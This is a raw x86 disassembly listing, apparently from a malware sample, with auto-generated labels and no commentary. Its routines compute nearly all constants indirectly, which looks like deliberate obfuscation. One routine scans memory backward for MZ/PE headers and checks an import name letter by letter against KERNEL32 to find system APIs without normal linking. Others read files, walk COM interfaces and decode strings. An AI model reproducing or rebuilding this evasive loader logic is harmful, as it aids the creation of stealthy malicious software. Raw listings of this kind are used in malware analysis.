movsx eax, byte ptr [ebp+eax-10Eh]
cmp eax, ds:10013248h
jnz short loc_422006
push 10013D6Dh
call sub_41E914
pop ecx
mov edx, ds:1001318Ch
add edx, ds:1001309Ch
sub edx, 5
push edx
push 0
push eax
push 0
call dword ptr ds:10012644h
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000FA40h
jmp loc_422372
; ---------------------------------------------------------------------------
loc_422006: ; CODE XREF: .data:00421FBF�j
push 10013D68h
call sub_41E914
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-214h], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:10012BA4h
mov eax, ds:100131ACh
movsx eax, byte ptr [ebp+eax-108h]
mov edx, ds:10013184h
sub edx, 2
cmp eax, edx
jnz short loc_4220BA
push 10013D46h
call sub_41E914
pop ecx
mov edx, ds:1001319Ch
add edx, ds:1001325Ch
sub edx, 0Eh
push edx
push 0
push eax
push 0
call dword ptr ds:10012644h
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000FA40h
jmp loc_422372
; ---------------------------------------------------------------------------
loc_4220BA: ; CODE XREF: .data:00422073�j
push 10013D41h
call sub_41E914
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
add esp, 14h
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-218h], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:10012BA4h
movsx eax, word ptr ds:10013098h
movsx eax, byte ptr [ebp+eax-105h]
mov edx, ds:1001318Ch
add edx, ds:10013268h
sub edx, 4
cmp eax, edx
jz loc_42225C
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_42213E: ; CODE XREF: .data:00422143�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_42213E
mov ecx, ds:10013120h
sub ecx, 1
cmp eax, ecx
jb loc_42225C
movsx eax, word ptr ds:10013150h
add eax, ds:1001321Ch
sub eax, 10h
mov [ebp-105h], al
jmp short loc_422190
; ---------------------------------------------------------------------------
loc_42216E: ; CODE XREF: .data:004221A9�j
movzx eax, byte ptr [ebp-105h]
mov al, [ebp+eax-103h]
cmp al, 30h
jl short loc_422184
cmp al, 39h
jle short loc_422189
loc_422184: ; CODE XREF: .data:0042217E�j
jmp loc_42225C
; ---------------------------------------------------------------------------
loc_422189: ; CODE XREF: .data:00422182�j
add byte ptr [ebp-105h], 1
loc_422190: ; CODE XREF: .data:0042216C�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_422199: ; CODE XREF: .data:0042219E�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422199
movzx ecx, byte ptr [ebp-105h]
cmp ecx, eax
jb short loc_42216E
mov eax, ds:10013280h
add eax, ds:100130D4h
sub eax, 0Ah
mov [ebp-104h], al
jmp short loc_422238
; ---------------------------------------------------------------------------
loc_4221C1: ; CODE XREF: .data:00422251�j
mov al, [ebp-104h]
mov [ebp-219h], al
jmp short loc_4221F8
; ---------------------------------------------------------------------------
loc_4221CF: ; CODE XREF: .data:00422211�j
movzx eax, byte ptr [ebp-219h]
movsx eax, byte ptr [ebp+eax-103h]
movzx edx, byte ptr [ebp-104h]
movsx edx, byte ptr [ebp+edx-103h]
cmp eax, edx
jnz short loc_422213
add byte ptr [ebp-219h], 1
loc_4221F8: ; CODE XREF: .data:004221CD�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_422201: ; CODE XREF: .data:00422206�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422201
movzx ecx, byte ptr [ebp-219h]
cmp ecx, eax
jb short loc_4221CF
loc_422213: ; CODE XREF: .data:004221EF�j
movzx eax, byte ptr [ebp-219h]
movzx edx, byte ptr [ebp-104h]
sub eax, edx
movsx edx, word ptr ds:100130BCh
sub edx, 6
cmp eax, edx
jg short loc_42225C
add byte ptr [ebp-104h], 1
loc_422238: ; CODE XREF: .data:004221BF�j
lea ecx, [ebp-103h]
or eax, 0FFFFFFFFh
loc_422241: ; CODE XREF: .data:00422246�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422241
movzx ecx, byte ptr [ebp-104h]
cmp ecx, eax
jb loc_4221C1
jmp loc_4222EB
; ---------------------------------------------------------------------------
loc_42225C: ; CODE XREF: .data:0042212F�j
; .data:00422150�j ...
mov eax, ds:100131C4h
add eax, 7CBh
push eax
call dword ptr ds:10012630h
push 10013D08h
call sub_41E914
mov [ebp-21Ch], eax
push 10013CF1h
call sub_41E914
movsx edx, word ptr ds:10013174h
sub edx, 7
push edx
push eax
mov edx, [ebp-21Ch]
push edx
push 0
call dword ptr ds:10012644h
push 10013CEDh
call sub_41E914
add esp, 10h
push eax
mov eax, 30h
mul edi
mov [ebp-220h], eax
mov edx, eax
push dword ptr ds:10010388h[edx]
call dword ptr ds:10012658h
mov eax, 30h
mul edi
mov [ebp-224h], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000FA40h
jmp loc_422372
; ---------------------------------------------------------------------------
loc_4222EB: ; CODE XREF: .data:00422257�j
push 10013CE8h
call sub_41E914
push eax
lea edx, [ebp-204h]
push edx
call dword ptr ds:1000D020h
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
mov eax, 30h
mul edi
mov [ebp-228h], eax
push dword ptr ds:10010378h[eax]
call dword ptr ds:10010224h
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D04Ch
add esp, 18h
push 5
mov eax, 30h
mul edi
mov [ebp-22Ch], eax
push dword ptr ds:10010374h[eax]
call dword ptr ds:1001265Ch
mov eax, 30h
mul edi
mov [ebp-230h], eax
and dword ptr ds:10010370h[eax], 0
loc_422372: ; CODE XREF: .data:00421E1E�j
; .data:00421E2F�j ...
mov eax, ds:100130C8h
movsx edx, word ptr ds:100131B4h
mov edi, eax
add edi, edx
sub edi, 4
jmp loc_42245E
; ---------------------------------------------------------------------------
loc_42238A: ; CODE XREF: .data:0042246A�j
mov eax, 30h
mul edi
mov [ebp-8], eax
cmp esi, ds:10010380h[eax]
jnz short loc_4223C1
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-0Ch], eax
push dword ptr ds:10010390h[eax]
call dword ptr ds:1001260Ch
jmp loc_422470
; ---------------------------------------------------------------------------
loc_4223C1: ; CODE XREF: .data:0042239B�j
mov eax, 30h
mul edi
mov [ebp-10h], eax
cmp esi, ds:10010384h[eax]
jnz short loc_4223F5
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-14h], eax
push dword ptr ds:10010394h[eax]
call dword ptr ds:1001260Ch
jmp short loc_422470
; ---------------------------------------------------------------------------
loc_4223F5: ; CODE XREF: .data:004223D2�j
mov eax, 30h
mul edi
mov [ebp-18h], eax
cmp esi, ds:10010388h[eax]
jnz short loc_422429
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-1Ch], eax
push dword ptr ds:10010398h[eax]
call dword ptr ds:1001260Ch
jmp short loc_422470
; ---------------------------------------------------------------------------
loc_422429: ; CODE XREF: .data:00422406�j
mov eax, 30h
mul edi
mov [ebp-20h], eax
cmp esi, ds:1001037Ch[eax]
jnz short loc_42245D
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push esi
mov eax, 30h
mul edi
mov [ebp-24h], eax
push dword ptr ds:1001039Ch[eax]
call dword ptr ds:1001260Ch
jmp short loc_422470
; ---------------------------------------------------------------------------
loc_42245D: ; CODE XREF: .data:0042243A�j
inc edi
loc_42245E: ; CODE XREF: .data:00422385�j
movsx eax, word ptr ds:100130D8h
add eax, 62h
cmp edi, eax
jb loc_42238A
loc_422470: ; CODE XREF: .data:004223BC�j
; .data:004223F3�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422477 proc near ; CODE XREF: sub_41CD81+247�p
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 1
push [ebp+arg_4]
call sub_41E9F7
add esp, 8
mov [ebp+var_48], eax
test eax, eax
jnz loc_42269C
mov [ebp+var_18], 8
push 10013CD8h
call sub_421B74
pop ecx
push eax
call dword ptr ds:1000D044h
mov [ebp+var_10], eax
lea eax, [ebp+var_8]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_4]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
movsx eax, word ptr ds:100131A4h
sub eax, 7
cmp ebx, eax
jnz loc_422684
lea eax, [ebp+var_3C]
push eax
push 10014A68h
mov eax, [ebp+var_8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013280h
add eax, ds:1001320Ch
sub eax, 0Ah
cmp ebx, eax
jnz loc_42267B
mov [ebp+var_30], 2
mov eax, ds:10013164h
sub eax, 4
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_30]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_3C]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov eax, ds:10013288h
add eax, ds:10013184h
sub eax, 8
cmp ebx, eax
jnz loc_422672
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 10014A78h
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:10013160h
dec eax
cmp ebx, eax
jnz loc_422669
inc dword ptr ds:1000F620h
movsx eax, word ptr ds:10013104h
add eax, 2
cmp ds:1000F620h, eax
jb short loc_4225C4
mov eax, ds:100130F4h
add eax, 3
mov ds:1000F620h, eax
push [ebp+var_4]
call sub_41D930
pop ecx
jmp loc_422660
; ---------------------------------------------------------------------------
loc_4225C4: ; CODE XREF: sub_422477+130�j
mov eax, ds:100130ACh
movsx edx, word ptr ds:100130D8h
add eax, edx
sub eax, 3
mov [ebp+var_4C], eax
lea eax, [ebp+var_44]
push eax
push dword ptr ds:10011640h
call sub_42288C
mov [ebp+var_34], eax
lea eax, [ebp+var_40]
push eax
push dword ptr ds:1000D018h
call sub_42288C
add esp, 10h
mov [ebp+var_38], eax
cmp [ebp+var_44], 0
jz short loc_422620
cmp [ebp+var_34], 0
jz short loc_422620
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_44]
push [ebp+var_34]
call sub_41DA2F
add esp, 10h
loc_422620: ; CODE XREF: sub_422477+18C�j
; sub_422477+192�j
cmp [ebp+var_40], 0
jz short loc_422641
cmp [ebp+var_38], 0
jz short loc_422641
lea eax, [ebp+var_4C]
push eax
push [ebp+var_4]
push [ebp+var_40]
push [ebp+var_38]
call sub_41DA2F
add esp, 10h
loc_422641: ; CODE XREF: sub_422477+1AD�j
; sub_422477+1B3�j
push [ebp+var_34]
call dword ptr ds:1000F61Ch
push [ebp+var_38]
call dword ptr ds:1000F61Ch
push 0
push [ebp+arg_4]
call sub_41E9F7
add esp, 8
loc_422660: ; CODE XREF: sub_422477+148�j
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_422669: ; CODE XREF: sub_422477+114�j
mov eax, [ebp+var_1C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_422672: ; CODE XREF: sub_422477+E8�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_42267B: ; CODE XREF: sub_422477+94�j
mov eax, [ebp+var_8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_422684: ; CODE XREF: sub_422477+66�j
lea eax, [ebp+var_18]
push eax
call dword ptr ds:10012BA0h
movsx eax, word ptr ds:100131E0h
sub eax, 3
cmp ebx, eax
jz short $+2
loc_42269C: ; CODE XREF: sub_422477+1B�j
pop edi
pop esi
pop ebx
leave
retn
sub_422477 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 18C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4226A9 proc near ; CODE XREF: sub_41E19D+2CE�p
; sub_41F764+263�p
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
push edi
push [ebp+arg_4]
call dword ptr ds:10012630h
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_425399
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_4226D7: ; CODE XREF: sub_4226A9+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4226D7
mov edx, ds:100131C4h
add edx, ds:1001314Ch
sub edx, 0Ah
mov ebx, eax
sub ebx, edx
mov edx, ds:10013254h
sub edx, 9
mov [ebp+ebx+var_316], dl
mov eax, ds:10013268h
movsx edx, word ptr ds:100130A4h
mov edi, eax
add edi, edx
sub edi, 0Ah
loc_422714: ; CODE XREF: sub_4226A9+177�j
mov eax, edi
movsx ecx, word ptr ds:10013240h
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word ptr ds:100131F0h
dec ecx
mul ecx
mov [ebp+var_324], eax
mov eax, ds:100131F4h
movsx edx, word ptr ds:100130CCh
add eax, edx
sub eax, 0Ah
mov edx, [ebp+var_324]
add edx, eax
mov eax, ds:1001321Ch
sub eax, 8
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
mov edx, ds:10013114h
sub edx, 8
cmp eax, edx
jnz loc_42281F
mov eax, edi
mov ecx, ds:10013270h
sub ecx, 2
mul ecx
mov [ebp+var_328], eax
mov eax, ds:100130F8h
add eax, ds:100130ECh
sub eax, 9
mov edx, [ebp+var_328]
add edx, eax
movsx eax, word ptr ds:1001316Ch
add eax, ds:10013164h
sub eax, 5
mov [ebp+edx+var_212], al
mov eax, ds:1001314Ch
mov [ebp+var_32C], eax
mov eax, edi
mov edx, [ebp+var_32C]
mov ecx, edx
add ecx, ds:10013204h
sub ecx, 5
mul ecx
mov [ebp+var_330], eax
mov eax, ds:1001314Ch
sub eax, 3
mov edx, [ebp+var_330]
add edx, eax
movsx eax, word ptr ds:100130B0h
movsx ecx, word ptr ds:10013124h
add eax, ecx
sub eax, 0Dh
mov [ebp+edx+var_212], al
jmp short loc_422825
; ---------------------------------------------------------------------------
loc_42281F: ; CODE XREF: sub_4226A9+DE�j
inc edi
jmp loc_422714
; ---------------------------------------------------------------------------
loc_422825: ; CODE XREF: sub_4226A9+174�j
cmp dword ptr ds:100132ACh, 0
jz short loc_422866
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000F604h
mov esi, eax
or esi, esi
jz short loc_422866
cmp dword ptr ds:100132B0h, 0
jz short loc_422887
mov eax, ds:1001313Ch
sub eax, 2
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000D01Ch
loc_422866: ; CODE XREF: sub_4226A9+183�j
; sub_4226A9+198�j
push dword ptr ds:1000F614h
push dword ptr ds:10012610h
lea eax, [ebp+var_316]
push eax
call sub_423353
add esp, 0Ch
mov [ebp+var_31C], eax
loc_422887: ; CODE XREF: sub_4226A9+1A1�j
pop edi
pop esi
pop ebx
leave
retn
sub_4226A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42288C proc near ; CODE XREF: .data:0041FDDD�p
; sub_422477+16B�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10012788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4228D5
cmp [ebp+arg_4], 0
jz short loc_4228D1
mov eax, [ebp+arg_4]
movsx edx, word ptr ds:100130BCh
add edx, ds:100131ACh
sub edx, 0Eh
mov [eax], edx
loc_4228D1: ; CODE XREF: sub_42288C+2E�j
xor eax, eax
jmp short loc_422919
; ---------------------------------------------------------------------------
loc_4228D5: ; CODE XREF: sub_42288C+28�j
push 0
push edi
call dword ptr ds:10012624h
mov esi, eax
add eax, 10h
push eax
push 40h
call dword ptr ds:1000FA34h
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_4228FE
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_422904
; ---------------------------------------------------------------------------
loc_4228FE: ; CODE XREF: sub_42288C+68�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_422904: ; CODE XREF: sub_42288C+70�j
push [ebp+var_8]
push esi
push ebx
push edi
call dword ptr ds:1000D028h
push edi
call dword ptr ds:10011654h
mov eax, ebx
loc_422919: ; CODE XREF: sub_42288C+47�j
pop edi
pop esi
pop ebx
leave
retn
sub_42288C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42291E proc near ; CODE XREF: sub_41BF88+1CA�p
; sub_41D354+2D9�p ...
var_120A = byte ptr -120Ah
var_110B = byte ptr -110Bh
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 120Ch
call sub_425379
push ebx
push esi
push edi
push 100138A8h
call sub_41E914
push eax
lea edi, [ebp+var_FFF]
push edi
call dword ptr ds:10012634h
add esp, 0Ch
mov esi, ds:100131B8h
sub esi, 5
jmp short loc_42296E
; ---------------------------------------------------------------------------
loc_422954: ; CODE XREF: sub_42291E+56�j
cmp [ebp+esi+var_FFF], 23h
jnz short loc_42296D
mov eax, ds:100131F8h
sub eax, 3
mov [ebp+esi+var_FFF], al
loc_42296D: ; CODE XREF: sub_42291E+3E�j
inc esi
loc_42296E: ; CODE XREF: sub_42291E+34�j
cmp esi, 0FFFh
jb short loc_422954
mov eax, ds:100131B8h
sub eax, 5
mov [ebp+var_1004], eax
mov eax, ds:100130C4h
mov ebx, eax
add ebx, ds:100130C8h
sub ebx, 7
cmp [ebp+arg_0], 0
jnz short loc_4229F3
loc_42299A: ; CODE XREF: sub_42291E+D3�j
mov eax, [ebp+arg_4]
cmp [ebp+var_1004], eax
jnz short loc_4229BC
lea eax, [ebp+ebx+var_FFF]
push eax
push 10012670h
call sub_425399
jmp loc_422C46
; ---------------------------------------------------------------------------
loc_4229BC: ; CODE XREF: sub_42291E+85�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_4229C6: ; CODE XREF: sub_42291E+AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4229C6
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:1001315Ch
sub edx, 9
cmp eax, edx
jz loc_422C46
jmp short loc_42299A
; ---------------------------------------------------------------------------
loc_4229F3: ; CODE XREF: sub_42291E+7A�j
mov eax, ds:10013350h
mov [ebp+var_1008], eax
mov eax, ds:10013210h
add eax, ds:10013268h
sub eax, 5
mov edx, [ebp+arg_0]
mov ecx, ds:100130D4h
sub ecx, 6
mov [edx+eax], cl
mov eax, ds:1001309Ch
mov ebx, eax
add ebx, ds:1001318Ch
sub ebx, 5
mov eax, ds:100131D0h
add eax, ds:1001312Ch
sub eax, 0Fh
mov [ebp+var_1004], eax
loc_422A3F: ; CODE XREF: sub_42291E+300�j
push 1001389Dh
call sub_41E914
push eax
lea edi, [ebp+var_110B]
push edi
call sub_425399
lea eax, [ebp+ebx+var_FFF]
push eax
lea eax, [ebp+var_110B]
push eax
call dword ptr ds:1000D020h
add esp, 0Ch
call dword ptr ds:10012BACh
mov ecx, 14h
cdq
idiv ecx
mov [ebp+var_100C], edx
mov eax, ds:10013090h
add eax, ds:10013220h
sub eax, 5
cmp edx, eax
jnb loc_422B71
push [ebp+var_1008]
lea eax, [ebp+var_120A]
push eax
call sub_41CFF0
mov eax, ds:1001319Ch
movsx edx, word ptr ds:10013230h
add eax, edx
sub eax, 0Bh
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_41A8C2
add esp, 14h
mov edi, ds:10013220h
add edi, 0FFFBh
cmp eax, edi
jnz short loc_422B05
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
push 10013898h
call sub_41E914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 14h
loc_422B05: ; CODE XREF: sub_42291E+1BE�j
mov eax, ds:100130DCh
sub eax, 2
push eax
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call sub_41A8C2
add esp, 0Ch
mov edi, ds:1001319Ch
add edi, 0FFF9h
cmp eax, edi
jnz short loc_422B6B
push 1001388Dh
call sub_41E914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
lea eax, [ebp+var_120A]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
push 10013888h
call sub_41E914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 20h
loc_422B6B: ; CODE XREF: sub_42291E+210�j
inc [ebp+var_1008]
loc_422B71: ; CODE XREF: sub_42291E+174�j
push [ebp+var_1004]
call sub_41F0D6
pop ecx
mov [ebp+var_100C], eax
mov ecx, ds:100131A8h
cmp eax, ecx
jnb short loc_422BE9
movsx eax, word ptr ds:10013150h
sub eax, 7
push eax
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call sub_41A8C2
add esp, 0Ch
movsx edi, word ptr ds:10013208h
mov edx, ds:1001313Ch
lea edi, [edi+edx+0FFF7h]
cmp eax, edi
jnz short loc_422BE9
lea eax, [ebp+var_110B]
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
push 10013883h
call sub_41E914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 14h
loc_422BE9: ; CODE XREF: sub_42291E+26D�j
; sub_42291E+2A2�j
lea ecx, [ebp+ebx+var_FFF]
or eax, 0FFFFFFFFh
loc_422BF3: ; CODE XREF: sub_42291E+2DA�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_422BF3
add ebx, eax
add ebx, 1
inc [ebp+var_1004]
movsx eax, [ebp+ebx+var_FFF]
mov edx, ds:1001326Ch
add edx, ds:10013090h
sub edx, 0Ch
cmp eax, edx
jnz loc_422A3F
push 1001387Eh
call sub_41E914
push eax
push [ebp+arg_0]
call dword ptr ds:1000D020h
add esp, 0Ch
mov eax, [ebp+var_1008]
mov ds:10013350h, eax
loc_422C46: ; CODE XREF: sub_42291E+99�j
; sub_42291E+CD�j
pop edi
pop esi
pop ebx
leave
retn
sub_42291E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, ds:10007C0Ah
mov [ebp-10h], eax
mov edx, eax
movsx ecx, word ptr ds:10013160h
add ecx, 0Fh
mov eax, edx
shr eax, cl
movsx edx, word ptr ds:10013124h
add edx, 0Ah
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_422C80: ; CODE XREF: .data:00422C98�j
; .data:00422CC8�j ...
mov [ebp-18h], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_422C9A
mov eax, ds:10013188h
add eax, 10000h
sub ebx, eax
jmp short loc_422C80
; ---------------------------------------------------------------------------
loc_422C9A: ; CODE XREF: .data:00422C8A�j
mov eax, ds:1001315Ch
add eax, 2Dh
add eax, ds:10013288h
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp-14h], eax
mov ecx, [ebp-10h]
cmp eax, ecx
jbe short loc_422CCA
movsx eax, word ptr ds:100130E8h
add eax, 0FFFFh
sub ebx, eax
jmp short loc_422C80
; ---------------------------------------------------------------------------
loc_422CCA: ; CODE XREF: .data:00422CB8�j
mov eax, [ebp-14h]
mov [ebp-8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_422CEA
movsx eax, word ptr ds:10013218h
add eax, 0FFFBh
sub ebx, eax
jmp short loc_422C80
; ---------------------------------------------------------------------------
loc_422CEA: ; CODE XREF: .data:00422CD8�j
mov eax, [ebp-8]
mov eax, [eax+80h]
mov [ebp-0Ch], eax
movsx eax, word ptr ds:10013174h
sub eax, 7
mov [ebp-4], eax
jmp loc_422E87
; ---------------------------------------------------------------------------
loc_422D08: ; CODE XREF: .data:00422E93�j
mov eax, ebx
add eax, [ebp-0Ch]
add eax, [ebp-4]
mov [ebp-12Ch], eax
mov edx, ds:1001312Ch
movsx ecx, word ptr ds:10013180h
add edx, ecx
sub edx, 0Ch
cmp [eax], edx
jz loc_422E99
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp-130h], edx
push edx
lea eax, [ebp-127h]
push eax
call sub_425399
mov eax, ds:100131ACh
add eax, ds:10013164h
sub eax, 9
mov [ebp-28h], eax
jmp short loc_422D83
; ---------------------------------------------------------------------------
loc_422D61: ; CODE XREF: .data:00422DA2�j
mov eax, [ebp-28h]
mov al, [ebp+eax-127h]
cmp al, 61h
jle short loc_422D80
cmp al, 7Ah
jge short loc_422D80
mov eax, [ebp-28h]
lea eax, [ebp+eax-127h]
sub byte ptr [eax], 20h
loc_422D80: ; CODE XREF: .data:00422D6D�j
; .data:00422D71�j
inc dword ptr [ebp-28h]
loc_422D83: ; CODE XREF: .data:00422D5F�j
mov eax, [ebp-28h]
movsx eax, byte ptr [ebp+eax-127h]
mov edx, ds:10013164h
movsx ecx, word ptr ds:100131B4h
add edx, ecx
sub edx, 8
cmp eax, edx
jnz short loc_422D61
mov eax, ds:10013120h
movsx edx, word ptr ds:100130CCh
add eax, edx
cmp byte ptr [ebp+eax-133h], 4Bh
jnz loc_422E83
mov eax, ds:1001309Ch
cmp byte ptr [ebp+eax-12Bh], 45h
jnz loc_422E83
mov eax, ds:100130ECh
cmp byte ptr [ebp+eax-129h], 52h
jnz loc_422E83
mov eax, ds:10013138h
cmp byte ptr [ebp+eax-122h], 4Ch
jnz loc_422E83
mov eax, ds:100131F8h
cmp byte ptr [ebp+eax-124h], 33h
jnz short loc_422E83
mov eax, ds:10013210h
add eax, 4
add eax, ds:100131A8h
cmp byte ptr [ebp+eax-127h], 32h
jnz short loc_422E83
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+10h]
mov [ebp-138h], edx
mov eax, ds:10013204h
dec eax
mov [ebp-134h], eax
loc_422E3D: ; CODE XREF: .data:00422E7F�j
mov eax, [ebp-138h]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, ds:10013198h
sub eax, 2
cmp edi, eax
jz short loc_422E99
push edi
call sub_41C9D0
pop ecx
cmp dword ptr ds:10013294h, 0
jnz short loc_422E99
movsx eax, word ptr ds:10013130h
add eax, ds:10013110h
sub eax, 4
add [ebp-134h], eax
jmp short loc_422E3D
; ---------------------------------------------------------------------------
db 0EBh, 16h
; ---------------------------------------------------------------------------
loc_422E83: ; CODE XREF: .data:00422DBA�j
; .data:00422DCD�j ...
add dword ptr [ebp-4], 14h
loc_422E87: ; CODE XREF: .data:00422D03�j
mov eax, [ebp-8]
mov eax, [eax+84h]
cmp [ebp-4], eax
jb loc_422D08
loc_422E99: ; CODE XREF: .data:00422D2A�j
; .data:00422E57�j ...
cmp dword ptr ds:10013294h, 0
jz short loc_422EFA
call sub_41C512
call sub_42136F
call sub_41BB03
mov edx, eax
mov [ebp-19h], dl
movzx eax, byte ptr [ebp-19h]
mov edx, ds:10013140h
add edx, ds:10013204h
sub edx, 8
cmp eax, edx
jz short loc_422EFA
lea eax, [ebp-24h]
push eax
mov eax, ds:100131BCh
add eax, ds:100130ACh
sub eax, 0Ah
push eax
lea eax, [ebp-20h]
push eax
push 10007C0Ah
mov eax, ds:10013110h
sub eax, 5
push eax
push 0
call dword ptr ds:10012B90h
loc_422EFA: ; CODE XREF: .data:00422EA0�j
; .data:00422ECB�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422EFF proc near ; CODE XREF: sub_41F465+CD�p
; sub_41F465+122�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
